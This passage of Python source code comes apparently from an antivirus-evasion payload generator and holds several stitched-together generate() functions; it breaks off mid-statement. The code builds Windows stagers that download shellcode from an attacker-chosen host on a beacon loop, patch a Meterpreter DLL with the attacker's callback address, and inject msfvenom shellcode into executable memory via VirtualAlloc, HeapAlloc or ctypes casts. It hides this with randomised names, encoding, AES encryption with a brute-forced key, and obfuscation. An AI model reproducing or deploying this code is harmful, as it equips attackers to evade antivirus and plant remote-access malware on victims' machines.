(getexec_func, url_var) getexec += "\n\ttry:" getexec += "\n\t\t%s = %s.open(%s)" % (info_var, opener_var, url_var) getexec += "\n\t\t%s = %s.read()" % (shellcode_var, info_var) getexec += "\n\t\t%s = bytearray(%s)" % (shellcode_var, shellcode_var) getexec += "\n\t\t%s(%s)" % (inject_func, shellcode_var) getexec += "\n\texcept Exception:" getexec += "\n\t\tpass\n" url_var = helpers.randomString() beaconthr = "def %s(%s):" % (beaconthr_func, url_var) beaconthr += "\n\twhile True:" beaconthr += "\n\t\ttime.sleep(%s)" % interval_var beaconthr += "\n\t\t%s = threading.Thread(name='%s', target=%s, args=(%s,))" % (thread_var, thread_name, getexec_func, url_var) beaconthr += "\n\t\t%s.setDaemon(True)" % thread_var beaconthr += "\n\t\t%s.start()\n" % thread_var main = "def %s():" % main_func main += "\n\t%s = 'http://%s:%s/%s'" % (url_var, self.required_options['DOWNLOAD_HOST'][0], self.required_options['DOWNLOAD_PORT'][0], self.required_options['DOWNLOAD_NAME'][0]) main += "\n\tif %s is True:" % retry_var main += "\n\t\t%s = threading.Thread(name='%s', target=%s, args=(%s,))" % (thread_var, thread_name, beaconthr_func, url_var) main += "\n\t\t%s.setDaemon(True)" % thread_var main += "\n\t\t%s.start()" % thread_var main += "\n\t%s(%s)" % (getexec_func, url_var) if self.required_options["BEACON"][0].lower() == 'y': main += "\n\twhile True:" main += "\n\t\ttime.sleep(0.1)" main += "\nif __name__ == '__main__':" main += "\n\t%s()" % main_func PayloadCode = imports + global_vars + inject + getexec + beaconthr + main if self.required_options["USE_PYHERION"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode
def generate(self): # lambda function used for patching the metsvc.dll dllReplace = lambda dll,ind,s: dll[:ind] + s + dll[ind+len(s):] # patch the metsrv.dll header meterpreterDll, headerPatch = helpers.selfcontained_patch() meterpreterDll = dllReplace(meterpreterDll,0,headerPatch) # patch in the default user agent string userAgentIndex = meterpreterDll.index("METERPRETER_UA\x00") userAgentString = "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)\x00" meterpreterDll = dllReplace(meterpreterDll,userAgentIndex,userAgentString) # turn off SSL sslIndex = meterpreterDll.index("METERPRETER_TRANSPORT_SSL") sslString = "METERPRETER_TRANSPORT_HTTP\x00" meterpreterDll = dllReplace(meterpreterDll,sslIndex,sslString) # replace the URL/port of the handler urlIndex = meterpreterDll.index("https://" + ("X" * 256)) urlString = "http://" + self.required_options['LHOST'][0] + ":" + str(self.required_options['LPORT'][0]) + "/" + self.genHTTPChecksum() + "_" + helpers.randomString(16) + "/\x00" meterpreterDll = dllReplace(meterpreterDll,urlIndex,urlString) # replace the expiration timeout with the default value of 300 expirationTimeoutIndex = meterpreterDll.index(struct.pack('<I', 0xb64be661)) expirationTimeout = struct.pack('<I', 604800) meterpreterDll = dllReplace(meterpreterDll,expirationTimeoutIndex,expirationTimeout) # replace the communication timeout with the default value of 300 communicationTimeoutIndex = meterpreterDll.index(struct.pack('<I', 0xaf79257f)) communicationTimeout = struct.pack('<I', 300) meterpreterDll = dllReplace(meterpreterDll,communicationTimeoutIndex,communicationTimeout) # compress/base64 encode the dll compressedDll = helpers.deflate(meterpreterDll) # actually build out the payload payloadCode = "" # traditional void pointer injection if self.required_options["inject_method"][0].lower() == "void": # doing void * cast payloadCode += "from ctypes import *\nimport base64,zlib\n" randInflateFuncName = helpers.randomString() randb64stringName = helpers.randomString() randVarName = helpers.randomString() # deflate function payloadCode += "def "+randInflateFuncName+"("+randb64stringName+"):\n" payloadCode += "\t" + randVarName + " = base64.b64decode( "+randb64stringName+" )\n" payloadCode += "\treturn zlib.decompress( "+randVarName+" , -15)\n" randVarName = helpers.randomString() randFuncName = helpers.randomString() payloadCode += randVarName + " = " + randInflateFuncName + "(\"" + compressedDll + "\")\n" payloadCode += randFuncName + " = cast(" + randVarName + ", CFUNCTYPE(c_void_p))\n" payloadCode += randFuncName+"()\n" # VirtualAlloc() injection else: payloadCode += 'import ctypes,base64,zlib\n' randInflateFuncName = helpers.randomString() randb64stringName = helpers.randomString() randVarName = helpers.randomString() randPtr = helpers.randomString() randBuf = helpers.randomString() randHt = helpers.randomString() # deflate function payloadCode += "def "+randInflateFuncName+"("+randb64stringName+"):\n" payloadCode += "\t" + randVarName + " = base64.b64decode( "+randb64stringName+" )\n" payloadCode += "\treturn zlib.decompress( "+randVarName+" , -15)\n" payloadCode += randVarName + " = bytearray(" + randInflateFuncName + "(\"" + compressedDll + "\"))\n" payloadCode += randPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len('+ randVarName +')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n' payloadCode += randBuf + ' = (ctypes.c_char * len(' + randVarName + ')).from_buffer(' + randVarName + ')\n' payloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + randPtr + '),' + randBuf + ',ctypes.c_int(len(' + randVarName + ')))\n' payloadCode += randHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + randPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n' payloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + randHt + '),ctypes.c_int(-1))\n' if self.required_options["use_pyherion"][0].lower() == "y": payloadCode = encryption.pyherion(payloadCode) return payloadCode
def generate(self): if self.required_options["inject_method"][0].lower() == "virtual": if self.required_options["expire_payload"][0].lower() == "x": # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate() # Base64 Encode Shellcode EncodedShellcode = base64.b64encode(Shellcode) # Generate Random Variable Names ShellcodeVariableName = helpers.randomString() RandPtr = helpers.randomString() RandBuf = helpers.randomString() RandHt = helpers.randomString() RandT = helpers.randomString() PayloadCode = 'import ctypes\n' PayloadCode += 'import base64\n' PayloadCode += RandT + " = \"" + EncodedShellcode + "\"\n" PayloadCode += ShellcodeVariableName + " = bytearray(" + RandT + ".decode('base64','strict').decode(\"string_escape\"))\n" PayloadCode += RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + ShellcodeVariableName + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n' PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n' PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n' PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n' PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n' if self.required_options["use_pyherion"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode else: # Get our current date and add number of days to the date todaysdate = date.today() expiredate = str(todaysdate + timedelta(days=int(self.required_options["expire_payload"][0]))) # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate() # Base64 Encode Shellcode EncodedShellcode = base64.b64encode(Shellcode) # Generate Random Variable Names ShellcodeVariableName = helpers.randomString() RandPtr = helpers.randomString() RandBuf = helpers.randomString() RandHt = helpers.randomString() RandT = helpers.randomString() RandToday = helpers.randomString() RandExpire = helpers.randomString() PayloadCode = 'import ctypes\n' PayloadCode += 'import base64\n' PayloadCode += 'from datetime import datetime\n' PayloadCode += 'from datetime import date\n\n' PayloadCode += RandToday + ' = datetime.now()\n' PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n' PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n' PayloadCode += '\t' + RandT + " = \"" + EncodedShellcode + "\"\n" PayloadCode += '\t' + ShellcodeVariableName + " = bytearray(" + RandT + ".decode('base64','strict').decode(\"string_escape\"))\n" PayloadCode += '\t' + RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + ShellcodeVariableName + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n' PayloadCode += '\t' + RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n' PayloadCode += '\t' + 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n' PayloadCode += '\t' + RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n' PayloadCode += '\t' + 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n' if self.required_options["use_pyherion"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode if self.required_options["inject_method"][0].lower() == "heap": if self.required_options["expire_payload"][0].lower() == "x": # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate() # Base64 Encode Shellcode EncodedShellcode = base64.b64encode(Shellcode) # Generate Random Variable Names ShellcodeVariableName = helpers.randomString() RandPtr = helpers.randomString() RandBuf = helpers.randomString() RandHt = helpers.randomString() RandT = helpers.randomString() HeapVar = helpers.randomString() PayloadCode = 'import ctypes\n' PayloadCode += 'import base64\n' PayloadCode += RandT + " = \"" + EncodedShellcode + "\"\n" PayloadCode += ShellcodeVariableName + " = bytearray(" + RandT + ".decode('base64','strict').decode(\"string_escape\"))\n" PayloadCode += HeapVar + ' = ctypes.windll.kernel32.HeapCreate(ctypes.c_int(0x00040000),ctypes.c_int(len(' + ShellcodeVariableName + ') * 2),ctypes.c_int(0))\n' PayloadCode += RandPtr + ' = ctypes.windll.kernel32.HeapAlloc(ctypes.c_int(' + HeapVar + '),ctypes.c_int(0x00000008),ctypes.c_int(len( ' + ShellcodeVariableName + ')))\n' PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n' PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n' PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n' PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n' if self.required_options["use_pyherion"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode else: # Get our current date and add number of days to the date todaysdate = date.today() expiredate = str(todaysdate + timedelta(days=int(self.required_options["expire_payload"][0]))) # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate() # Base64 Encode Shellcode EncodedShellcode = base64.b64encode(Shellcode) # Generate Random Variable Names ShellcodeVariableName = helpers.randomString() RandPtr = helpers.randomString() RandBuf = helpers.randomString() RandHt = helpers.randomString() RandT = helpers.randomString() HeapVar = helpers.randomString() RandToday = helpers.randomString() RandExpire = helpers.randomString() PayloadCode = 'import ctypes\n' PayloadCode += 'import base64\n' PayloadCode += 'from datetime import datetime\n' PayloadCode += 'from datetime import date\n\n' PayloadCode += RandToday + ' = datetime.now()\n' PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n' PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n' PayloadCode += '\t' + RandT + " = \"" + EncodedShellcode + "\"\n" PayloadCode += '\t' + ShellcodeVariableName + " = bytearray(" + RandT + ".decode('base64','strict').decode(\"string_escape\"))\n" PayloadCode += '\t' + HeapVar + ' = ctypes.windll.kernel32.HeapCreate(ctypes.c_int(0x00040000),ctypes.c_int(len(' + ShellcodeVariableName + ') * 2),ctypes.c_int(0))\n' PayloadCode += '\t' + RandPtr + ' = ctypes.windll.kernel32.HeapAlloc(ctypes.c_int(' + HeapVar + '),ctypes.c_int(0x00000008),ctypes.c_int(len( ' + ShellcodeVariableName + ')))\n' PayloadCode += '\t' + RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n' PayloadCode += '\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n' PayloadCode += '\t' + RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n' PayloadCode += '\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n' if self.required_options["use_pyherion"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode else: if self.required_options["expire_payload"][0].lower() == "x": # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate() # Generate Random Variable Names ShellcodeVariableName = helpers.randomString() RandShellcode = helpers.randomString() RandReverseShell = helpers.randomString() RandMemoryShell = helpers.randomString() DecodedShellcode = helpers.randomString() # Base64 Encode Shellcode EncodedShellcode = base64.b64encode(Shellcode) PayloadCode = 'from ctypes import *\n' PayloadCode += 'import base64\n' PayloadCode += ShellcodeVariableName + " = \"" + EncodedShellcode + "\"\n" PayloadCode += DecodedShellcode + " = bytearray(" + ShellcodeVariableName + ".decode('base64','strict').decode(\"string_escape\"))\n" PayloadCode += RandMemoryShell + ' = create_string_buffer(str(' + DecodedShellcode + '), len(str(' + DecodedShellcode + ')))\n' PayloadCode += RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n' PayloadCode += RandShellcode + '()' if self.required_options["use_pyherion"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode else: # Get our current date and add number of days to the date todaysdate = date.today() expiredate = str(todaysdate + timedelta(days=int(self.required_options["expire_payload"][0]))) # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate() # Generate Random Variable Names ShellcodeVariableName = helpers.randomString() RandShellcode = helpers.randomString() RandReverseShell = helpers.randomString() RandMemoryShell = helpers.randomString() DecodedShellcode = helpers.randomString() RandToday = helpers.randomString() RandExpire = helpers.randomString() # Base64 Encode Shellcode EncodedShellcode = base64.b64encode(Shellcode) PayloadCode = 'from ctypes import *\n' PayloadCode += 'import base64\n' PayloadCode += 'from datetime import datetime\n' PayloadCode += 'from datetime import date\n\n' PayloadCode += RandToday + ' = datetime.now()\n' PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n' PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n' PayloadCode += '\t' + ShellcodeVariableName + " = \"" + EncodedShellcode + "\"\n" PayloadCode += '\t' + DecodedShellcode + " = bytearray(" + ShellcodeVariableName + ".decode('base64','strict').decode(\"string_escape\"))\n" PayloadCode += '\t' + RandMemoryShell + ' = create_string_buffer(str(' + DecodedShellcode + '), len(str(' + DecodedShellcode + ')))\n' PayloadCode += '\t' + RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n' PayloadCode += '\t' + RandShellcode + '()' if self.required_options["use_pyherion"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode
def generate(self): if self.required_options["INJECT_METHOD"][0].lower() == "virtual": if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x": # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate() # Generate Random Variable Names ShellcodeVariableName = helpers.randomString() RandPtr = helpers.randomString() RandBuf = helpers.randomString() RandHt = helpers.randomString() RandDecodeAES = helpers.randomString() RandCipherObject = helpers.randomString() RandDecodedShellcode = helpers.randomString() RandShellCode = helpers.randomString() RandPadding = helpers.randomString() known_plaintext_string = helpers.randomString() plaintext_string_variable = helpers.randomString() key_guess = helpers.randomString() secret_key = helpers.randomString() small_constrained_key_variable = helpers.randomString() # encrypt the shellcode and grab the randomized key (EncodedShellcode, partial_key, secret) = encryption.constrainedAES(Shellcode) # Use the secret we received earlier to encrypt our known plaintext string encrypted_plaintext_string = encryption.knownPlaintext(secret, known_plaintext_string) # Create Payload code PayloadCode = 'import ctypes\n' PayloadCode += 'from Crypto.Cipher import AES\n' PayloadCode += 'import base64\n' PayloadCode += 'import os\n' PayloadCode += small_constrained_key_variable + ' = \'' + partial_key + '\'\n' PayloadCode += RandPadding + ' = \'{\'\n' PayloadCode += RandDecodeAES + ' = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(' + RandPadding + ')\n' PayloadCode += 'for ' + key_guess + ' in range(100000, 1000000):\n' PayloadCode += '\t' + secret_key + " = " + small_constrained_key_variable + ' + str(' + key_guess + ')\n' PayloadCode += '\t' + RandCipherObject + ' = AES.new(' + secret_key + ')\n' PayloadCode += '\t' + plaintext_string_variable + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + encrypted_plaintext_string + '\')\n' PayloadCode += '\tif ' + plaintext_string_variable + ' == \'' + known_plaintext_string + '\':\n' PayloadCode += '\t\t' + RandDecodedShellcode + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + EncodedShellcode + '\')\n' PayloadCode += '\t\t' + RandShellCode + ' = bytearray(' + RandDecodedShellcode + '.decode("string_escape"))\n' PayloadCode += '\t\t' + RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + RandShellCode + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n' PayloadCode += '\t\t' + RandBuf + ' = (ctypes.c_char * len(' + RandShellCode + ')).from_buffer(' + RandShellCode + ')\n' PayloadCode += '\t\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + RandShellCode + ')))\n' PayloadCode += '\t\t' + RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n' PayloadCode += '\t\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n' if self.required_options["USE_PYHERION"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode else: # Get our current date and add number of days to the date todaysdate = date.today() expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0]))) # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate() # Generate Random Variable Names ShellcodeVariableName = helpers.randomString() RandPtr = helpers.randomString() RandBuf = helpers.randomString() RandHt = helpers.randomString() RandDecodeAES = helpers.randomString() RandCipherObject = helpers.randomString() RandDecodedShellcode = helpers.randomString() RandShellCode = helpers.randomString() RandPadding = helpers.randomString() RandToday = helpers.randomString() RandExpire = helpers.randomString() known_plaintext_string = helpers.randomString() plaintext_string_variable = helpers.randomString() key_guess = helpers.randomString() secret_key = helpers.randomString() small_constrained_key_variable = helpers.randomString() # encrypt the shellcode and grab the randomized key (EncodedShellcode, partial_key, secret) = encryption.constrainedAES(Shellcode) # Use the secret we received earlier to encrypt our known plaintext string encrypted_plaintext_string = encryption.knownPlaintext(secret, known_plaintext_string) # Create Payload code PayloadCode = 'import ctypes\n' PayloadCode += 'from Crypto.Cipher import AES\n' PayloadCode += 'import base64\n' PayloadCode += 'import os\n' PayloadCode += 'from datetime import datetime\n' PayloadCode += 'from datetime import date\n\n' PayloadCode += RandToday + ' = datetime.now()\n' PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n' PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n' PayloadCode += '\t' + small_constrained_key_variable + ' = \'' + partial_key + '\'\n' PayloadCode += '\t' + RandPadding + ' = \'{\'\n' PayloadCode += '\t' + RandDecodeAES + ' = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(' + RandPadding + ')\n' PayloadCode += '\tfor ' + key_guess + ' in range(100000, 1000000):\n' PayloadCode += '\t\t' + secret_key + " = " + small_constrained_key_variable + ' + str(' + key_guess + ')\n' PayloadCode += '\t\t' + RandCipherObject + ' = AES.new(' + secret_key + ')\n' PayloadCode += '\t\t' + plaintext_string_variable + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + encrypted_plaintext_string + '\')\n' PayloadCode += '\t\tif ' + plaintext_string_variable + ' == \'' + known_plaintext_string + '\':\n' PayloadCode += '\t\t\t' + RandDecodedShellcode + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + EncodedShellcode + '\')\n' PayloadCode += '\t\t\t' + RandShellCode + ' = bytearray(' + RandDecodedShellcode + '.decode("string_escape"))\n' PayloadCode += '\t\t\t' + RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + RandShellCode + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n' PayloadCode += '\t\t\t' + RandBuf + ' = (ctypes.c_char * len(' + RandShellCode + ')).from_buffer(' + RandShellCode + ')\n' PayloadCode += '\t\t\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + RandShellCode + ')))\n' PayloadCode += '\t\t\t' + RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n' PayloadCode += '\t\t\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n' if self.required_options["USE_PYHERION"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode if self.required_options["INJECT_METHOD"][0].lower() == "heap": if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x": # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate() # Generate Random Variable Names ShellcodeVariableName = helpers.randomString() RandPtr = helpers.randomString() RandBuf = helpers.randomString() RandHt = helpers.randomString() RandDecodeAES = helpers.randomString() RandCipherObject = helpers.randomString() RandDecodedShellcode = helpers.randomString() RandShellCode = helpers.randomString() RandPadding = helpers.randomString() known_plaintext_string = helpers.randomString() plaintext_string_variable = helpers.randomString() key_guess = helpers.randomString() secret_key = helpers.randomString() small_constrained_key_variable = helpers.randomString() HeapVar = helpers.randomString() # encrypt the shellcode and grab the randomized key (EncodedShellcode, partial_key, secret) = encryption.constrainedAES(Shellcode) # Use the secret we received earlier to encrypt our known plaintext string encrypted_plaintext_string = encryption.knownPlaintext(secret, known_plaintext_string) # Create Payload code PayloadCode = 'import ctypes\n' PayloadCode += 'from Crypto.Cipher import AES\n' PayloadCode += 'import base64\n' PayloadCode += 'import os\n' PayloadCode += small_constrained_key_variable + ' = \'' + partial_key + '\'\n' PayloadCode += RandPadding + ' = \'{\'\n' PayloadCode += RandDecodeAES + ' = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(' + RandPadding + ')\n' PayloadCode += 'for ' + key_guess + ' in range(100000, 1000000):\n' PayloadCode += '\t' + secret_key + " = " + small_constrained_key_variable + ' + str(' + key_guess + ')\n' PayloadCode += '\t' + RandCipherObject + ' = AES.new(' + secret_key + ')\n' PayloadCode += '\t' + plaintext_string_variable + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + encrypted_plaintext_string + '\')\n' PayloadCode += '\tif ' + plaintext_string_variable + ' == \'' + known_plaintext_string + '\':\n' PayloadCode += '\t\t' + RandDecodedShellcode + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + EncodedShellcode + '\')\n' PayloadCode += '\t\t' + RandShellCode + ' = bytearray(' + RandDecodedShellcode + '.decode("string_escape"))\n' PayloadCode += '\t\t' + HeapVar + ' = ctypes.windll.kernel32.HeapCreate(ctypes.c_int(0x00040000),ctypes.c_int(len(' + RandShellCode + ') * 2),ctypes.c_int(0))\n' PayloadCode += '\t\t' + RandPtr + ' = ctypes.windll.kernel32.HeapAlloc(ctypes.c_int(' + HeapVar + '),ctypes.c_int(0x00000008),ctypes.c_int(len( ' + RandShellCode + ')))\n' PayloadCode += '\t\t' + RandBuf + ' = (ctypes.c_char * len(' + RandShellCode + ')).from_buffer(' + RandShellCode + ')\n' PayloadCode += '\t\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + RandShellCode + ')))\n' PayloadCode += '\t\t' + RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n' PayloadCode += '\t\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n' if self.required_options["USE_PYHERION"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode else: # Get our current date and add number of days to the date todaysdate = date.today() expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0]))) # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate() # Generate Random Variable Names ShellcodeVariableName = helpers.randomString() RandPtr = helpers.randomString() RandBuf = helpers.randomString() RandHt = helpers.randomString() RandDecodeAES = helpers.randomString() RandCipherObject = helpers.randomString() RandDecodedShellcode = helpers.randomString() RandShellCode = helpers.randomString() RandPadding = helpers.randomString() RandToday = helpers.randomString() RandExpire = helpers.randomString() known_plaintext_string = helpers.randomString() plaintext_string_variable = helpers.randomString() key_guess = helpers.randomString() secret_key = helpers.randomString() small_constrained_key_variable = helpers.randomString() HeapVar = helpers.randomString() # encrypt the shellcode and grab the randomized key (EncodedShellcode, partial_key, secret) = encryption.constrainedAES(Shellcode) # Use the secret we received earlier to encrypt our known plaintext string encrypted_plaintext_string = encryption.knownPlaintext(secret, known_plaintext_string) # Create Payload code PayloadCode = 'import ctypes\n' PayloadCode += 'from Crypto.Cipher import AES\n' PayloadCode += 'import base64\n' PayloadCode += 'import os\n' PayloadCode += 'from datetime import datetime\n' PayloadCode += 'from datetime import date\n\n' PayloadCode += RandToday + ' = datetime.now()\n' PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n' PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n' PayloadCode += '\t' + small_constrained_key_variable + ' = \'' + partial_key + '\'\n' PayloadCode += '\t' + RandPadding + ' = \'{\'\n' PayloadCode += '\t' + RandDecodeAES + ' = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(' + RandPadding + ')\n' PayloadCode += '\tfor ' + key_guess + ' in range(100000, 1000000):\n' PayloadCode += '\t\t' + secret_key + " = " + small_constrained_key_variable + ' + str(' + key_guess + ')\n' PayloadCode += '\t\t' + RandCipherObject + ' = AES.new(' + secret_key + ')\n' PayloadCode += '\t\t' + plaintext_string_variable + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + encrypted_plaintext_string + '\')\n' PayloadCode += '\t\tif ' + plaintext_string_variable + ' == \'' + known_plaintext_string + '\':\n' PayloadCode += '\t\t\t' + RandDecodedShellcode + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + EncodedShellcode + '\')\n' PayloadCode += '\t\t\t' + RandShellCode + ' = bytearray(' + RandDecodedShellcode + '.decode("string_escape"))\n' PayloadCode += '\t\t\t' + HeapVar + ' = ctypes.windll.kernel32.HeapCreate(ctypes.c_int(0x00040000),ctypes.c_int(len(' + RandShellCode + ') * 2),ctypes.c_int(0))\n' PayloadCode += '\t\t\t' + RandPtr + ' = ctypes.windll.kernel32.HeapAlloc(ctypes.c_int(' + HeapVar + '),ctypes.c_int(0x00000008),ctypes.c_int(len( ' + RandShellCode + ')))\n' PayloadCode += '\t\t\t' + RandBuf + ' = (ctypes.c_char * len(' + RandShellCode + ')).from_buffer(' + RandShellCode + ')\n' PayloadCode += '\t\t\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + RandShellCode + ')))\n' PayloadCode += '\t\t\t' + RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n' PayloadCode += '\t\t\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n' if self.required_options["USE_PYHERION"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode else: if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x": # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate() # Generate Random Variable Names ShellcodeVariableName = helpers.randomString() RandPtr = helpers.randomString() RandBuf = helpers.randomString() RandHt = helpers.randomString() RandDecodeAES = helpers.randomString() RandCipherObject = helpers.randomString() RandDecodedShellcode = helpers.randomString() RandShellCode = helpers.randomString() RandPadding = helpers.randomString() RandShellcode = 